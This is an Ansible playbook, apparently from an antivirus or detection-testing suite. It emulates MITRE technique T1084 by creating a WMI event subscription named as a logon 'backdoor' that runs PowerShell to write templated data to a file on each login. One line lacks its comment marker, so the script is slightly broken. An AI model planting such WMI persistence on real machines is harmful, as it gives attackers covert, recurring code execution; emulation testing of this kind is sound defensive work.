# attack_technique: T1084
- name: T1084 - Windows Management Instrumentation Event Subscription - Part 1
  hosts: windows
  vars_files:
   - /opt/ansible/vars.yaml
  tasks:
        - name: Create WMI Event subscription
          tags: always
          win_shell: |
            # Create Filter - User logging in
            $Filter = Set-WmiInstance -Namespace root\subscription -Class __EventFilter -Arguments @{
              EventNamespace = 'root/cimv2'
              Name = "Backdoor-Logon-Filter"
              Query = "SELECT * FROM __InstanceCreationEvent WITHIN 10 WHERE TargetInstance ISA 'Win32_LoggedOnUser'"
              #Query = "SELECT * FROM __InstanceCreationEvent WITHIN 10 WHERE TargetInstance ISA 'Win32_Process' and TargetInstance.ProcessName = notepad.exe"
              QueryLanguage = 'WQL'
            }
            # Configure Consumer with Command line
            $Command = "powershell.exe -Command Set-Content -Path C:\temp\{{ exfiltration_file }} -Value '{{ exfiltration_data }}'"
            $Consumer = Set-WmiInstance -Namespace root\subscription -Class CommandLineEventConsumer -Arguments @{
              Name = "Backdoor-Consumer"
              CommandLineTemplate = $Command }
              Configure Binding
            Set-WmiInstance -Namespace root/subscription -Class __FilterToConsumerBinding -Arguments @{
              Filter = $Filter
              Consumer = $Consumer}
              
        - name: sleep for 10 seconds and continue with play to check if AV removed or Not
          tags: always
          wait_for: timeout=10
          delegate_to: localhost
   
- import_playbook: T1084-2.yaml
  ignore_errors: yes  
